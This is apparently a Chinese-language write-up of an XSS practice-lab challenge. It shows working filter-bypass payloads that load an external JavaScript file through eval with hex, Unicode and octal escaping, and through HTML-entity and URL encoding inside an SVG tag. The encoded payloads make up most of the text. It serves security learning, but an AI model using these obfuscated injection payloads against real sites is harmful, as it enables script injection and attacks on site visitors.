当你的才华
还撑不起你的野心时
那你就应该静下心来学习
开头,先感谢小草表哥提供的XSS 练习靶场和群里师傅们分享的思路,谢谢大哥们,抱腿真舒服,奇奇怪怪的知识真多。
目录
0x01 独孤九剑第一手式【小草】
昨夜,看群看到小草表哥做的XSS练习靶场,今天睡醒了后来学习一下一些又多了的奇奇怪怪的姿势,我们首先访问页面,发现有一个师傅已经给出了思路,这题不是讲XSS漏洞的发现,而是XSS漏洞的利用方法,拿扫描器你扫不出啥来的。
题目:
要求我们加载任意JS代码,且成功加载http://xcao.vip/xss/alert.js
window._alert=alert; window.alert=function(data){ _alert("success"); } alert(1);
实体编码转换地址:http://bianma.51240.com/
0x02 Eval+JavaScript 编码绕过
解题思路:
- 通过使用 document.createElement() 方法来创建 <script>元素。
- 然后利用document.body.appendChild() 方法,将指定的DOM类型的节点加到document.body的末尾。
十六进制:
\x61\x67\x61\x6E\x3D\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x53\x43\x52\x49\x50\x54\x27\x29\x3B\x61\x67\x61\x6E\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x78\x63\x61\x6F\x2E\x76\x69\x70\x2F\x78\x73\x73\x2F\x61\x6C\x65\x72\x74\x2E\x6A\x73\x27\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x62\x6F\x64\x79\x2E\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x61\x67\x61\x6E\x29\x3B 
XSS PayLod:
agan=document.createElement('SCRIPT');agan.src='http://xcao.vip/xss/alert.js';document.body.appendChild(agan);成功弹窗
Unicode:
\u0061\u0067\u0061\u006E\u003D\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006C\u0065\u006D\u0065\u006E\u0074\u0028\u0027\u0053\u0043\u0052\u0049\u0050\u0054\u0027\u0029\u003B\u0061\u0067\u0061\u006E\u002E\u0073\u0072\u0063\u003D\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0078\u0063\u0061\u006F\u002E\u0076\u0069\u0070\u002F\u0078\u0073\u0073\u002F\u0061\u006C\u0065\u0072\u0074\u002E\u006A\u0073\u0027\u003B\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0062\u006F\u0064\u0079\u002E\u0061\u0070\u0070\u0065\u006E\u0064\u0043\u0068\u0069\u006C\u0064\u0028\u0061\u0067\u0061\u006E\u0029\u003B 
XSS Paylod:
http://xcao.vip/test/xss1.php?data=xxx%22%3E%3Cscript%3Eeval.call`${%27\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073%27}`%3C/script%3E
八进制:
\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073 
XSS Payload:
http://xcao.vip/test/xss1.php?data=xxx%22%3E%3Cscript%3Eeval.call`${%27\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073%27}`%3C/script%3E
0x03 HTML 实体编码+URL编码绕过
解题思路:
可缩放矢量图形(SVG)是用于二维图形的基于XML的矢量图像格式,并支持交互性和动画。
SVG文件还支持嵌入式javascript代码。例如,开发人员可能在svg图像中使用javascript,以便他们可以实时进行操作。
如果网站使用XSS有效负载加载SVG文件,则将执行该文件。
- 将document 这段代码先进行Html 实体编码后,再进行HTML 实体编码后,再进行URL编码
- 最后,使用<SVG>绕过
注意:HTML标签中是支持10进制和16进制编码的,那么先将javascript:alert(1)做10进制编码,再做一次URL编码,为什么需要再做一次编码呢?是因为参数值中有&和#,需要一次URL编码
agan=document.createElement('SCRIPT');agan.src='http://xcao.vip/xss/alert.js';document.body.appendChild(agan);
或
document.body.appendChild(document.createElement('script')).src='http://xcao.vip/xss/alert.js' 
XSS Payload:
http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x3D%3b%26%23x64%3b%26%23x6F%3b%26%23x63%3b%26%23x75%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x2E%3b%26%23x63%3b%26%23x72%3b%26%23x65%3b%26%23x61%3b%26%23x74%3b%26%23x65%3b%26%23x45%3b%26%23x6C%3b%26%23x65%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x28%3b%26%23x27%3b%26%23x53%3b%26%23x43%3b%26%23x52%3b%26%23x49%3b%26%23x50%3b%26%23x54%3b%26%23x27%3b%26%23x29%3b%26%23x3B%3b%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x2E%3b%26%23x73%3b%26%23x72%3b%26%23x63%3b%26%23x3D%3b%26%23x27%3b%26%23x68%3b%26%23x74%3b%26%23x74%3b%26%23x70%3b%26%23x3A%3b%26%23x2F%3b%26%23x2F%3b%26%23x78%3b%26%23x63%3b%26%23x61%3b%26%23x6F%3b%26%23x2E%3b%26%23x76%3b%26%23x69%3b%26%23x70%3b%26%23x2F%3b%26%23x78%3b%26%23x73%3b%26%23x73%3b%26%23x2F%3b%26%23x61%3b%26%23x6C%3b%26%23x65%3b%26%23x72%3b%26%23x74%3b%26%23x2E%3b%26%23x6A%3b%26%23x73%3b%26%23x27%3b%26%23x3B%3b%26%23x64%3b%26%23x6F%3b%26%23x63%3b%26%23x75%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x2E%3b%26%23x62%3b%26%23x6F%3b%26%23x64%3b%26%23x79%3b%26%23x2E%3b%26%23x61%3b%26%23x70%3b%26%23x70%3b%26%23x65%3b%26%23x6E%3b%26%23x64%3b%26%23x43%3b%26%23x68%3b%26%23x69%3b%26%23x6C%3b%26%23x64%3b%26%23x28%3b%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x29%3b%26%23x3B%3b</script></svg>
当然还有其它的绕过姿势有兴趣的可以一 一尝试DATA协议(IE不支持)、URL编码等等,此题不是让你去弹个XSS,而是去加载js文件,别陷入误区了
虽然我们生活在阴沟里,但依然有人仰望星空!